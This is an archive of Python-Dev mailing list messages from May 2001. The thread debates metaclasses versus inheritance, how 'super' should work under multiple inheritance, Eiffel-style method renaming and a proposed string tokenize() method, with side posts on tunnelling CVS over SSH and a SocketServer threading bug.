References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
            <3AF10D91.802C8555@lemburg.com> 
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is belief that DictType should implicitly inherit attributes and 
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"<type 'DictType'>".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "<foo object at 0x......>".

But this method is overridden by DictType, so doesn't come into play.

Requiring explicit inheritance (whatever that may be) won't fix the
problem.

> Some of these ideas are burried in the "super" part of this 
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.  Given

  class D(A, B, C):
    def foo(self):
      super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
    def foo(self):
      D1.foo(self)

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the sane name defined in each of the base classes,
e.g.

  class C(A, B):
    def save(self):
      A.save(self)
      B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

      B.save(self)			# current Python
      B.__dict__['save'](self)		# ditto, butt ugly
      B::save(self)			# C++
      B._.save(self)			# Don Beaudry
      B.instanceMethods.save(self)	# ???

I still like current Python best!

> As Jim mentioned in his reply to Thomas' question, SmallTalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__". 

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
> 
> meta1            -->         o klass1
>                                o klass1a
>                                o klass1b
> meta2            -->         o klass2
>                                o klass2a
>                                o klass2b
> 
> class klass3(klass1a, klass2b):
>       ...                  
> 
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it looks if any of the other base classes
are not standard classes, and if so, gives control to the first such
base class.  Another way to say this is that the first base class that
has a non-standard metaclass gets control.

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May  3 16:28:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
             <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > Actually, I think that what's in the __dict__ is just perfect
> 
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May  3 16:26:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for awhile I thought maybe someone here would be able
to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port "nnn".
Using SSH to establish an interactive session to server is no problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro at server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro at firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip


From mal at lemburg.com  Thu May  3 18:08:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
	            <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
> 
> > We are actually trying to turn classes into types here :-)
> 
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) 

BTW, can you give a good starting point into all this (code wise
and concept wise) ? I'd like to play around these new concepts
a litte to get a beeter feeling for the possible issues (I should
have done the same for the coercion stuff a year ago: implementing
mxNumber I now find that some important hooks are missing :-().
 
> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
> 
> Sorry, you still seem to be confused about this. 

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to the another object".

In that sense, instances inherit from their classes and 
classes from their base-classes:

meta-class M ->        o base-class A
                         o class B
                           o instance x = B()  

Meta-class M control this "inheritance scheme" and can modify
it depending on its needs. 

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not 
defined in B or as instance attribute of B(). Querying x.a would then 
launch this process:

1. x.a -> fails
2. M.__findattr__(x, 'a') is called to find and return the
   attribute
3. M.__findattr__ asks B for an attribute 'a' -> fails
4.    -- " --     asks A       -- " --        -> success
5.    -- " --     returns the found attribute

I know that this is somewhat different under the covers than
what's happening now, but the Python programmer will not notice
this. It most probably does not work well with the Don Beaudry
hook though... so maybe I'm simply on the wrong track here.

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.  This is needed so that repr(DictType) returns
> "<type 'DictType'>".  It is *not* inherited from TypeType!
> 
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "<foo object at 0x......>".
> 
> But this method is overridden by DictType, so doesn't come into play.
> 
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.

With "explicit inheritance" I meant that the programmer has to
take care of passing the lookup on to the meta-class, rather
than applying some magic which hooks together class and meta-
class.
 
> > Some of these ideas are burried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
> 
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
> 
>   class D(A, B, C):
>     def foo(self):
>       super.foo(self)
> 
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
> 
>   class D1(A, B, C): pass
>   class D(D1):
>     def foo(self):
>       D1.foo(self)

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the sane name defined in each of the base classes,
> e.g.
> 
>   class C(A, B):
>     def save(self):
>       A.save(self)
>       B.save(self)
> 
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
> 
>       B.save(self)                      # current Python
>       B.__dict__['save'](self)          # ditto, butt ugly
>       B::save(self)                     # C++
>       B._.save(self)                    # Don Beaudry
>       B.instanceMethods.save(self)      # ???
> 
> I still like current Python best!

But it doesn't help us in the very common case of mixin classes
since there the method and sometimes even not the programmer
will know where the basemethod to call lives. This is why I
wrote the basemethod() helper: it looks up the right method
at run-time and thus allows writing mixin-classes which override
methods of other classes which are only known to the programmer
using the mixin and not necessarily to the one writing the mixin.
 
> > As Jim mentioned in his reply to Thomas' question, SmallTalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
> 
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.
 
> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
> 
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitely binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have made some great experience with loosly coupled object
systems and don't want to miss their flexibility anymore.)

> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> > meta1            -->         o klass1
> >                                o klass1a
> >                                o klass1b
> > meta2            -->         o klass2
> >                                o klass2a
> >                                o klass2b
> >
> > class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
> 
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it looks if any of the other base classes
> are not standard classes, and if so, gives control to the first such
> base class.  Another way to say this is that the first base class that
> has a non-standard metaclass gets control.

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paul at pfdubois.com  Thu May  3 18:24:40 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):


1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

class X (Y rename foo as _sfoo,
                  bar as _sbar
        ):
    def foo (self):
        self._sfoo()
        myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

class D (B rename a1 as ba1, C rename a1 as ca1):

     can now use self.ca1, self.a1

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.


From donb at abinitio.com  Thu May  3 18:47:29 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" <tim.one at home.com> wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
> 
>     super.f()
> 
> textually contained in a method of class K begins searching with:
> 
>     1) K.__bases__
> 
> or with:
> 
>     2) self.__class__.__bases__

It can only be 1.  The using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will
find the method you are already in... recursion is likely to terminate
in a stack overflow ;)

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Thu May  3 20:48:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>


From guido at digicool.com  Thu May  3 20:50:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
> 
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
> 
> 
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

class X(Y):
    Yfoo = Y.foo
    def foo(self):
        self.Yfoo()
        myfoostuff

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
> 
> class D (B rename a1 as ba1, C rename a1 as ca1):
> 
>      can now use self.ca1, self.a1
> 
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
> 
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler at inetnebr.com  Thu May  3 20:17:16 2001
From: jepler at inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:
	class X(Y):
		from Y import foo as _sfoo, bar as _sbar
		...

Of course, then you can spell inheritance as
	class X:
		from Y import *
Right?  :)

Jeff


From nas at python.ca  Thu May  3 21:05:37 2001
From: nas at python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
> 
> Why not let us spell this as:
> 	class X(Y):
> 		from Y import foo as _sfoo, bar as _sbar
> 		...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.

  Neil


From trentm at ActiveState.com  Thu May  3 21:39:27 2001
From: trentm at ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> > 
> > Why not let us spell this as:
> > 	class X(Y):
> > 		from Y import foo as _sfoo, bar as _sbar
> > 		...
> 
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto but how to you separate the "rename" lists for multiple inheritance?

    class X (Y rename foo as _sfoo, bar as _sbar; Z):
        pass
                                                ^---- what to use here

How about:

    class X(Y, Z):
        from Y inherit foo as _yfoo, bar as _ybar
        from Z inherit foo as _zfoo, bar as _zbar


Hmmmmm. Don't know if I like that either. Just throwing out ideas.

Trent

-- 
Trent Mick
TrentM at ActiveState.com


From greg at cosc.canterbury.ac.nz  Fri May  4 06:25:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to the another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Fri May  4 06:58:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf at artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
> MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's
less ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing
in Python as it does in C++, so it might just confuse C++
people.

What exactly *is* it going to mean in Python, anyway?
Will it have a corresponding __magic__ method, and if so,
what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Fri May  4 10:40:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to the another object".
> 
> Some OO languages munge together the instance and inheritance
> relationships, but Python isn't one of them. Using terminology
> that way in the context of Python is guaranteed to cause
> massive confusion!

But that's exactly what I am trying to do here: separate the
notion of how lookups work (inheritance) from how objects are 
created (instantiation) !

In Python instantiation binds the new object to the creating
class and all failing lookups are directed from the object to
the class. 

OTOH, the class - base-class lookup relationship 
doesn't have anything to do creation of objects -- classes
are simply bound to their base-classes per definition of the
class in the sense that failing lookups are directed to the
base-classes.

Classes themselves are created by meta-classes. The lookup
strategy between the two is defined by the meta-class.

What I'm argueing for is that meta-classes should get complete
control over how lookups and object creation are done. However,
this will only be possible by breaking the current automatic
lookup scheme at the meta-class - class boundary since otherwise
you'd run into endless loops during lookups (e.g. for many of
the __xxx__ methods).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May  4 11:04:08 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 11:04:08 +0200
Subject: [Python-Dev] "".tokenize() ?
Message-ID: <3AF27088.DE495210@lemburg.com>

Gustavo Niemeyer submitted a patch which adds a tokenize like
method to strings and Unicode:

"one, two and three".tokenize([",", "and"])
-> ["one", " two ", "three"]

I like this method -- should I review the code and then check it in ?

PS: Haven't gotten any response regarding the .decode() method yet...
should I take this as "no objections" ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 11:57:19 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 11:57:19 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff>

mal wrote:


> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1.  method bloat.  not exactly something you do every day, and
when you do, it's a one-liner:

def tokenize(string, ignore):
    [word for word in re.findall("\w+", string) if not word in ignore]

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

-0.  method bloat.  we don't have asfloat methods on integers and
asint methods on strings either...

Cheers /F


From mal at lemburg.com  Fri May  4 12:16:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 12:16:16 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff>
Message-ID: <3AF28170.399C2A5@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1.  method bloat.  not exactly something you do every day, and
> when you do, it's a one-liner:
> 
> def tokenize(string, ignore):
>     [word for word in re.findall("\w+", string) if not word in ignore]

This is not the same as what .tokenize() does: it cut at each
occurrance of a substring rather than words as in your example
(although I must say that list comprehension looks cool ;-).
 
> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> -0.  method bloat.  we don't have asfloat methods on integers and
> asint methods on strings either...

Well, we already have .encode() which interfaces to PyString_Encode(),
but no Python API for getting at PyString_Decode(). This is what
.decode() is for. Depending on the codecs you use, these two
methods can be very useful, e.g. for "fixing" line-endings or
hexifying strings. The codec concept can be used for far more
applications than just converting from and to Unicode.

About rich method APIs in general: I like having rich method APIs,
since they make life easier (you don't have to reinvent the wheel 
everytime you want a common job to be done). IMHO, too many
methods can never hurt, but I'm probably alone with that POV.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 12:50:06 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 12:50:06 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com>
Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff>

mal wrote:

> > > "one, two and three".tokenize([",", "and"])
> > > -> ["one", " two ", "three"]
> > >
> > > I like this method -- should I review the code and then check it in ?
> >
> > -1.  method bloat.  not exactly something you do every day, and
> > when you do, it's a one-liner:
> >
> > def tokenize(string, ignore):
> >     [word for word in re.findall("\w+", string) if not word in ignore]
>
> This is not the same as what .tokenize() does: it cut at each
> occurrance of a substring rather than words as in your example

oh, I didn't see the spaces.  splitting on all substrings is even
easier (but perhaps a bit more obscure, at least when written
on one line):

def tokenize(string, seps):
    return re.split("|".join(map(re.escape, seps)), string)

Cheers /F


From lkcl at samba-tng.org  Fri May  4 13:31:29 2001
From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 4 May 2001 13:31:29 +0200
Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn]
Message-ID: <20010504133129.K26116@angua.rince.de>

hi there,

i thought it best to bring this to someone's attention.

the forkingmixin code keeps track of its children, plus
because it forks, there's no close_requests() to interfere
with the operation of the child etc. etc.

now, for some marginally bizarre reason, adding an
extra base class - BaseServer - has, i believe (without
proof, just a hunch), caused a bug in ThreadingMixIn to be
more likely to occur.

now, i wrote BaseServer in order to be able to overload
this for a server that reads from a SQL server table
and performs actions based on what it reads from there
(the name of a host and the name of a python script to
action on the host, from the database :) :)

... but i don't do threading.  python is my first
actual exposure to thread programming.  does anyone
have enough experience with threads to write something
in less lines and less time than this message?

all best,

luke

----- Forwarded message from noreply at sourceforge.net -----

Delivered-To: lkcl at angua.rince.de
Delivered-To: lkcl at samba.org
To: noreply at sourceforge.net
From: noreply at sourceforge.net
Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn
Date: Thu, 03 May 2001 16:26:12 -0700

Bugs item #417845, was updated on 2001-04-21 08:28
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Guido van Rossum (gvanrossum)
Summary: Python 2.1: SocketServer.ThreadingMixIn

Initial Comment:
SocketServer.ThreadingMixIn does not work properly
since it tries to close the socket of a request two
times.


From gward at python.net  Fri May  4 20:12:44 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:12:44 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010504141244.A1167@gerg.ca>

On 03 May 2001, Paul F. Dubois said:
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Maybe I'm being thick, but don't you get the same effect by doing this:

class X (Y):
    _sfoo = Y.foo
    _sbar = Y.bar

...or would the "rename" syntax also hide the "foo" and "bar" names from
X's effective namespace[1]?  In that case, I guess some special syntax
is needed.

[1] "effective namespace" -- the union of X's class dict with all its
superclass' dicts; not actually X's namespace, but the set of names you
can use in X.  I think.  Err, whatever.

        Greg


From gward at python.net  Fri May  4 20:15:51 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:15:51 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <20010504141551.B1167@gerg.ca>

On 04 May 2001, M.-A. Lemburg said:
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
> 
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
> 
> I like this method -- should I review the code and then check it in ?

I concur with /F: -1 because you can do it easily with re.split().

        Greg
